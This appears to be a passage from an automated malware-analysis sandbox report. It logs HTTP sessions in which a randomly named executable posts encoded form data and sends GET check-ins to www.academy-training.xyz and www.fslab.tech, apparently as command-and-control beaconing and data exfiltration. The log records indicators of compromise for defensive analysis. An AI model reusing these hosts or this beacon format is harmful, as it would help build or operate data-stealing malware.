                                                              Data Raw: 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 3d 8e cd 0a c2 30 10 84 ef 7d 8a a1 97 de 0c 0a 5e 24 e6 22 f6 e6 45 7d 81 90 ac 6d a8 64 eb 6e aa f8 f6 56 91 ce 6d 7e 3e 18 db 6f dc 29 a9 a6 dc 81 05 29 07 16 a1 50 70 b8 9c 5b 04 e6 21 11 ca 7b a4 95 35 f3 b4 b2 23 c2 dd ab ee 6b 12 61 a9 5d 85 59 56 8b 70 ee dc f1 9b ed 60 cd df ff ca 6b 4f 10 7a 4c a4 85 22 7c 8c 42 aa 0b d2 98 f5 90 b6 a6 59 18 bc bc 22 73 c1 8d a7 1c c1 19 a5 4f 0a 25 79 92 cc 2f 46 57 7d 00 ce cb 33 48 b5 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 9e=0}^$"E}mdnVm~>o))Pp[!{5#ka]YVp`kOzL"|BY"sO%y/FW}3H0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.44974379.125.89.83805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:05:49.319444895 CEST736OUTPOST /1ki5/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.academy-training.xyz
                                                              Origin: http://www.academy-training.xyz
                                                              Referer: http://www.academy-training.xyz/1ki5/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 74 75 71 4b 32 56 7a 6e 4c 78 51 54 4e 50 51 32 41 61 68 6b 54 2f 6c 69 4e 37 51 70 6c 33 46 42 4a 4e 49 73 63 43 42 39 38 79 78 6a 75 67 52 44 77 42 76 49 43 45 2b 37 4a 41 36 6c 51 75 57 74 70 59 66 42 72 63 76 49 74 6b 43 33 41 6e 4d 62 77 5a 35 43 47 43 34 37 79 56 43 62 54 41 4c 77 35 67 71 64 5a 46 51 55 54 77 78 2f 4f 59 46 32 5a 6d 4b 41 4e 45 53 62 6b 55 53 66 76 66 77 4c 61 63 6b 6a 52 53 7a 6c 48 70 61 79 76 54 54 65 4e 6f 4d 34 73 4f 32 31 53 6e 4e 49 70 57 39 49 4f 59 78 48 73 45 62 44 56 61 76 43 36 2f 72 77 53 4f 73 49 45 32 31 4b 44 39 58 53 2f 33 50 58 6a 71 4f 77 77 36 2b 7a 33 57 37 51 4a 7a 56 2b 31 4f 2f 54 69 49 45 3d
                                                              Data Ascii: 3tV=tuqK2VznLxQTNPQ2AahkT/liN7Qpl3FBJNIscCB98yxjugRDwBvICE+7JA6lQuWtpYfBrcvItkC3AnMbwZ5CGC47yVCbTALw5gqdZFQUTwx/OYF2ZmKANESbkUSfvfwLackjRSzlHpayvTTeNoM4sO21SnNIpW9IOYxHsEbDVavC6/rwSOsIE21KD9XS/3PXjqOww6+z3W7QJzV+1O/TiIE=
                                                              Sep 12, 2024 15:05:49.943836927 CEST488INHTTP/1.1 403 Forbidden
                                                              Date: Thu, 12 Sep 2024 13:05:49 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Server: nginx
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Content-Type-Options: nosniff
                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                              Content-Encoding: gzip
                                                              Data Raw: 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 3d 8e cd 0a c2 30 10 84 ef 7d 8a a1 97 de 0c 0a 5e 24 e6 22 f6 e6 45 7d 81 90 ac 6d a8 64 eb 6e aa f8 f6 56 91 ce 6d 7e 3e 18 db 6f dc 29 a9 a6 dc 81 05 29 07 16 a1 50 70 b8 9c 5b 04 e6 21 11 ca 7b a4 95 35 f3 b4 b2 23 c2 dd ab ee 6b 12 61 a9 5d 85 59 56 8b 70 ee dc f1 9b ed 60 cd df ff ca 6b 4f 10 7a 4c a4 85 22 7c 8c 42 aa 0b d2 98 f5 90 b6 a6 59 18 bc bc 22 73 c1 8d a7 1c c1 19 a5 4f 0a 25 79 92 cc 2f 46 57 7d 00 ce cb 33 48 b5 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 9e=0}^$"E}mdnVm~>o))Pp[!{5#ka]YVp`kOzL"|BY"sO%y/FW}3H0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.44974479.125.89.83805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:05:51.871735096 CEST10818OUTPOST /1ki5/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.academy-training.xyz
                                                              Origin: http://www.academy-training.xyz
                                                              Referer: http://www.academy-training.xyz/1ki5/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 74 75 71 4b 32 56 7a 6e 4c 78 51 54 4e 50 51 32 41 61 68 6b 54 2f 6c 69 4e 37 51 70 6c 33 46 42 4a 4e 49 73 63 43 42 39 38 79 35 6a 75 53 70 44 78 69 33 49 59 45 2b 37 58 51 36 6b 51 75 58 76 70 63 37 46 72 63 69 39 74 6e 71 33 52 32 73 62 35 4d 56 43 64 53 34 37 36 31 43 59 58 41 4b 71 35 6a 44 57 5a 46 41 55 54 77 78 2f 4f 65 68 32 4e 45 75 41 50 45 53 59 74 30 53 59 72 66 77 33 61 63 38 64 52 57 76 66 48 59 36 79 75 7a 44 65 41 36 30 34 7a 2b 32 33 42 58 4e 51 70 57 34 51 4f 59 74 4c 73 45 48 70 56 59 7a 43 71 72 75 57 4b 39 55 77 65 58 78 49 42 4f 50 53 33 47 37 70 36 6f 69 79 33 4a 69 72 6a 45 7a 74 4d 78 59 42 6f 2f 66 67 36 6f 76 4f 32 30 57 49 43 43 31 62 32 61 63 54 41 75 6d 59 44 79 79 56 32 7a 46 61 55 4f 4a 41 71 62 39 4e 30 45 6f 34 54 4a 43 77 42 68 4c 77 48 47 34 63 37 47 50 30 65 2f 33 2f 70 33 79 35 4b 50 32 57 4b 71 6a 54 35 4b 52 46 43 50 65 64 67 6e 65 75 45 53 78 69 79 2b 49 79 49 73 65 4e 62 77 62 71 6b 52 44 74 56 2f 46 36 44 2b 78 66 4e 38 53 34 37 70 70 6b 36 6c [TRUNCATED]
                                                              Data Ascii: 3tV=tuqK2VznLxQTNPQ2AahkT/liN7Qpl3FBJNIscCB98y5juSpDxi3IYE+7XQ6kQuXvpc7Frci9tnq3R2sb5MVCdS4761CYXAKq5jDWZFAUTwx/Oeh2NEuAPESYt0SYrfw3ac8dRWvfHY6yuzDeA604z+23BXNQpW4QOYtLsEHpVYzCqruWK9UweXxIBOPS3G7p6oiy3JirjEztMxYBo/fg6ovO20WICC1b2acTAumYDyyV2zFaUOJAqb9N0Eo4TJCwBhLwHG4c7GP0e/3/p3y5KP2WKqjT5KRFCPedgneuESxiy+IyIseNbwbqkRDtV/F6D+xfN8S47ppk6lTiTJRfL48uNuvdpHA3JlnQZTBckLYsVPyWL4YEUuveVJE6rTmCvIFKFymeSBPd/P5y/EBPTGKxIihI3vbbVkJ0IoM3XWtn6Bd/rYDW+9VY3Z1b3B86dTi8exhIq8PQOouJtoMViw/fu5GkAiN4zTWEyJxaGvhb+qjUuNW144vZ36K3+/UOBIygCgM1c1mr/Pt1BtxFan2Y+dw1O58cj3z2yksa38MhvVV4DVzWNocFjBcqOUjkEtv1iSZ6oHL61oS7PVvZaQVXVk7l2xqAqha5JydCOTaUSZDHzQgcAQV4twh4v4oCYrwN2+xQS+A+zLfXI46kO57vQj3/YQTAE4lg1A7rfXM/kzWSjgzs3Xwaj6RL79kM9aB1zjkKlLTj/u0gJ97lK7XVYnSCww9Ie4Q3Yxy9P1GVJsDIPqlWVd0XHGWXQOoTI5VEXs+pydYbQ/cq4hynDPtAgJN83LdX1Hng1pPVuTz2yoVzocYGGGL/KAjVYoRzolcPfbVVlVH7AAo7ZsACw399QtJTv/UMzf61BMInRfJoALJOPKjr8cfrcy0APbBJoDr1d/X6pBeIOLofnBUjwAqy0xNmtkitdDbn1A8uumIpf/qvxbHqoLfyKPvtmNtNcnJRJCwjrUQDTW/w9qkUN2ZlgnJ1L6aNXZf14FJc/2gxuezI [TRUNCATED]
                                                              Sep 12, 2024 15:05:52.576183081 CEST488INHTTP/1.1 403 Forbidden
                                                              Date: Thu, 12 Sep 2024 13:05:52 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Server: nginx
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Content-Type-Options: nosniff
                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                              Content-Encoding: gzip
                                                              Data Raw: 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 3d 8e cd 0a c2 30 10 84 ef 7d 8a a1 97 de 0c 0a 5e 24 e6 22 f6 e6 45 7d 81 90 ac 6d a8 64 eb 6e aa f8 f6 56 91 ce 6d 7e 3e 18 db 6f dc 29 a9 a6 dc 81 05 29 07 16 a1 50 70 b8 9c 5b 04 e6 21 11 ca 7b a4 95 35 f3 b4 b2 23 c2 dd ab ee 6b 12 61 a9 5d 85 59 56 8b 70 ee dc f1 9b ed 60 cd df ff ca 6b 4f 10 7a 4c a4 85 22 7c 8c 42 aa 0b d2 98 f5 90 b6 a6 59 18 bc bc 22 73 c1 8d a7 1c c1 19 a5 4f 0a 25 79 92 cc 2f 46 57 7d 00 ce cb 33 48 b5 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 9e=0}^$"E}mdnVm~>o))Pp[!{5#ka]YVp`kOzL"|BY"sO%y/FW}3H0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.44974579.125.89.83805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:05:54.581515074 CEST439OUTGET /1ki5/?3tV=gsCq1lWJF1dgPZoYALsPcNVJYLoWokZlTtBhbiV8szE8yhkYsHvmTVOKeDfgQfnx9IrMke6/s2GfQFtZ1s1QNRcJqVfOe3H7gjz1UwsXUQ8sNONuaUThKkQ=&IhkTb=xPfHG0o8kZI8 HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.academy-training.xyz
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:05:55.205617905 CEST607INHTTP/1.1 404 Not Found
                                                              Date: Thu, 12 Sep 2024 13:05:55 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Server: nginx
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Content-Type-Options: nosniff
                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                              Data Raw: 31 32 63 0d 0a 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 73 74 72 6f 6e 67 3e 45 72 72 6f 72 3a 20 3c 2f 73 74 72 6f 6e 67 3e 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 61 64 64 72 65 73 73 20 3c 73 74 72 6f 6e 67 3e 27 2f 31 6b 69 35 2f 3f 33 74 56 3d 67 73 43 71 31 6c 57 4a 46 31 64 67 50 5a 6f 59 41 4c 73 50 63 4e 56 4a 59 4c 6f 57 6f 6b 5a 6c 54 74 42 68 62 69 56 38 73 7a 45 38 79 68 6b 59 73 48 76 6d 54 56 4f 4b 65 44 66 67 51 66 6e 78 39 49 72 4d 6b 65 36 2f 73 32 47 66 51 46 74 5a 31 73 31 51 4e 52 63 4a 71 56 66 4f 65 33 48 37 67 6a 7a 31 55 77 73 58 55 51 38 73 4e 4f 4e 75 61 55 54 68 4b 6b 51 3d 26 61 6d 70 3b 49 68 6b 54 62 3d 78 50 66 48 47 30 6f 38 6b 5a 49 38 27 3c 2f 73 74 72 6f 6e 67 3e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 12c<h2>Not Found</h2><p class="error"> <strong>Error: </strong> The requested address <strong>'/1ki5/?3tV=gsCq1lWJF1dgPZoYALsPcNVJYLoWokZlTtBhbiV8szE8yhkYsHvmTVOKeDfgQfnx9IrMke6/s2GfQFtZ1s1QNRcJqVfOe3H7gjz1UwsXUQ8sNONuaUThKkQ=&amp;IhkTb=xPfHG0o8kZI8'</strong> was not found on this server.</p>0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.449747160.251.148.115805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:06:00.747618914 CEST686OUTPOST /5jwl/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.fslab.tech
                                                              Origin: http://www.fslab.tech
                                                              Referer: http://www.fslab.tech/5jwl/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 62 67 43 36 50 38 42 56 48 47 33 4d 59 71 4a 7a 2b 43 62 31 35 56 5a 4e 76 6b 47 55 30 71 4a 58 69 52 2f 36 33 73 57 75 65 51 42 78 57 6a 77 7a 6e 5a 70 32 48 69 41 53 78 73 5a 6a 62 6e 4a 31 6a 32 53 45 6a 45 7a 35 32 6f 48 6d 58 74 59 73 72 33 52 41 37 5a 63 59 6f 73 61 64 45 73 66 4a 65 39 57 57 76 69 51 70 33 42 2b 2b 53 46 48 6d 61 4e 71 6d 55 50 53 36 4a 59 58 57 67 70 46 43 56 6c 5a 6f 50 35 62 78 61 6e 39 69 38 58 6a 57 4a 79 64 72 78 34 44 57 52 44 38 35 52 6a 5a 36 36 61 59 4d 62 61 32 2f 2f 38 71 4d 4e 57 69 34 6e 31 47 63 66 6c 4d 69 70 48 56 76 6a 43 38 72 4c 41 3d 3d
                                                              Data Ascii: 3tV=bgC6P8BVHG3MYqJz+Cb15VZNvkGU0qJXiR/63sWueQBxWjwznZp2HiASxsZjbnJ1j2SEjEz52oHmXtYsr3RA7ZcYosadEsfJe9WWviQp3B++SFHmaNqmUPS6JYXWgpFCVlZoP5bxan9i8XjWJydrx4DWRD85RjZ66aYMba2//8qMNWi4n1GcflMipHVvjC8rLA==
                                                              Sep 12, 2024 15:06:01.557938099 CEST377INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Thu, 12 Sep 2024 13:06:01 GMT
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Encoding: gzip
                                                              Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.449748160.251.148.115805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:06:03.292758942 CEST706OUTPOST /5jwl/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.fslab.tech
                                                              Origin: http://www.fslab.tech
                                                              Referer: http://www.fslab.tech/5jwl/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 62 67 43 36 50 38 42 56 48 47 33 4d 59 4b 35 7a 37 68 7a 31 31 6c 5a 4f 6c 45 47 55 74 36 49 63 69 52 7a 36 33 70 32 2b 64 6a 6c 78 59 6d 30 7a 6d 59 70 32 45 69 41 53 35 4d 5a 6d 47 33 4a 38 6a 32 65 32 6a 41 33 35 32 73 58 6d 58 73 6f 73 71 41 39 44 68 70 63 57 6b 4d 61 44 4b 4d 66 4a 65 39 57 57 76 6a 67 58 33 42 57 2b 53 31 58 6d 61 73 71 6c 64 76 53 6c 5a 49 58 57 6b 70 46 65 56 6c 5a 61 50 37 75 6b 61 6c 46 69 38 53 48 57 4a 44 64 6f 37 34 44 51 4f 54 39 38 65 69 59 50 38 34 4a 44 61 62 69 4e 77 34 37 72 42 77 7a 69 32 45 6e 4c 4e 6c 6f 52 30 41 63 62 75 42 42 69 51 45 33 41 4a 47 51 56 67 35 6d 35 32 44 52 35 49 67 64 6b 4f 4d 30 3d
                                                              Data Ascii: 3tV=bgC6P8BVHG3MYK5z7hz11lZOlEGUt6IciRz63p2+djlxYm0zmYp2EiAS5MZmG3J8j2e2jA352sXmXsosqA9DhpcWkMaDKMfJe9WWvjgX3BW+S1XmasqldvSlZIXWkpFeVlZaP7ukalFi8SHWJDdo74DQOT98eiYP84JDabiNw47rBwzi2EnLNloR0AcbuBBiQE3AJGQVg5m52DR5IgdkOM0=
                                                              Sep 12, 2024 15:06:04.084152937 CEST377INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Thu, 12 Sep 2024 13:06:03 GMT
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Encoding: gzip
                                                              Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.449749160.251.148.115805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:06:05.844846010 CEST10788OUTPOST /5jwl/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.fslab.tech
                                                              Origin: http://www.fslab.tech
                                                              Referer: http://www.fslab.tech/5jwl/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 62 67 43 36 50 38 42 56 48 47 33 4d 59 4b 35 7a 37 68 7a 31 31 6c 5a 4f 6c 45 47 55 74 36 49 63 69 52 7a 36 33 70 32 2b 64 6a 74 78 59 51 49 7a 6d 2f 46 32 46 69 41 53 7a 73 5a 6e 47 33 49 38 6a 79 79 79 6a 46 76 70 32 75 66 6d 46 36 38 73 2f 43 46 44 30 35 63 57 73 73 61 65 45 73 65 4e 65 39 6d 53 76 6a 51 58 33 42 57 2b 53 7a 37 6d 59 39 71 6c 52 50 53 36 4a 59 58 4b 67 70 46 69 56 6b 78 67 50 34 43 30 61 30 6c 69 38 79 58 57 5a 68 6c 6f 33 34 44 53 4e 54 39 61 65 6e 41 6d 38 34 46 68 61 62 58 51 77 2f 4c 72 53 42 47 66 73 47 37 53 5a 45 6f 66 6f 51 38 6f 68 43 56 2b 59 6d 61 37 59 45 39 4c 38 39 32 50 35 52 67 47 56 56 5a 68 61 4c 6e 53 53 43 43 79 41 4e 4b 4a 59 56 72 61 32 56 55 78 58 75 4b 41 75 43 4d 35 43 50 73 78 37 5a 51 2f 4c 49 70 37 33 2f 38 55 6f 6c 6e 76 45 2f 41 69 61 46 6e 4e 2b 48 71 30 2f 46 74 49 36 6a 69 42 64 65 76 4f 33 79 66 47 69 41 33 68 6a 57 59 71 62 4c 6d 41 63 2b 39 4c 72 74 58 58 55 4a 53 4e 53 71 77 50 76 63 71 78 54 69 6a 51 6e 42 37 37 63 66 45 4b 56 4a [TRUNCATED]
                                                              Data Ascii: 3tV=bgC6P8BVHG3MYK5z7hz11lZOlEGUt6IciRz63p2+djtxYQIzm/F2FiASzsZnG3I8jyyyjFvp2ufmF68s/CFD05cWssaeEseNe9mSvjQX3BW+Sz7mY9qlRPS6JYXKgpFiVkxgP4C0a0li8yXWZhlo34DSNT9aenAm84FhabXQw/LrSBGfsG7SZEofoQ8ohCV+Yma7YE9L892P5RgGVVZhaLnSSCCyANKJYVra2VUxXuKAuCM5CPsx7ZQ/LIp73/8UolnvE/AiaFnN+Hq0/FtI6jiBdevO3yfGiA3hjWYqbLmAc+9LrtXXUJSNSqwPvcqxTijQnB77cfEKVJNrAEOo95PTxr2zDkg/bxkm+sIyQsVfICSPke5MoNiQ3scdvliE6FrS662478oLj4e7FeHn9SMjXG5AgcqEvMBhG8ptfjp2HaDHhEq/m2MjNHi7gicCxXUYdpgpR13uHbCeqqR5zVi7KKtQRlTdz1OBBFNKNvzJWOVJfBbARuoM5efvFW1vfbdvoGRmw6YjOTeB63GsjmIsfxPNSHa9AuhXJhLPadpseDhdzP+chmNRvRlF7Yb0dUNtU2/r0kgZbwCFnMeGy48pjJJr02r7woMP1lOin7Zh/+847wqSeMvWLEPPDBMr9vPMhxBUxcylkRnwFIgJEixQGqeASgo638hWWfNzTDckmjGEvAF+qzUeEQ6qLH3S81zzsZOpXodCpwcfwdgMcjkJvxyf/58crQFGtiicE0jeeijk9zpbJr6fNHe1T+/LfQH1kKaif7JUmL1W8XABOxRqff5QRQox22vponwIn7n4JbScfFErAhloGk8xWHWoKZbSqDJyNsVvyqHGgBYcpBL0jgdxOykdm9aReJ+GSysDeugk0zRC04+m+mWYW2k9ZlcU7kwazHe5gxgZlcA0d6qqZaj0CnMArZiAQWmrGhjqOWFKC/tNIADqzA1kGCX7a0fyKqlDGOJNL5P6n248/qeyhRrZs1WI3KNtdn9KTUlHx4Ah [TRUNCATED]
                                                              Sep 12, 2024 15:06:06.832684994 CEST377INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Thu, 12 Sep 2024 13:06:06 GMT
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Encoding: gzip
                                                              Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.449750160.251.148.115805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:06:08.382653952 CEST429OUTGET /5jwl/?3tV=WiqaMLg9GlvLXaJn7h+mylxer0KY04sj1yDW0eaYUTp/DgBuxfteLRta+sEBNgYjuWmWpmmo3drGW8kplXtIxb0p1+mOEbGDGuu9pjk/4w3rZz7uLvbccNY=&IhkTb=xPfHG0o8kZI8 HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.fslab.tech
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:06:09.187525988 CEST359INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Thu, 12 Sep 2024 13:06:09 GMT
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Content-Length: 196
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


